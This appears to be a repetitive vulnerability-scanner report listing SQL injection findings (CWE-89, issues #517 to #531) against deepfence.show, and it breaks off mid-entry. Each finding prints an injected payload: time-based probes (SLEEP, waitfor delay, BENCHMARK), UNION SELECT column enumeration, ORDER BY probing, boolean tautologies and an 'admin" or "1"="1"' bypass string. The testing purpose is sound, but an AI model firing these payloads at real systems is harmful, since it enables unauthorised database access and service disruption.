[3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #517\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \";waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #518\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAnD SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #519\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #520\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1083=1083 AND ('1427=1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #521\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #522\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RANDOMBLOB(1000000000/2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #523\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #524\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(deepfence.io 1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #525\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #526\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\" or \"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #527\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #528\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #529Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #530\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #531\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT 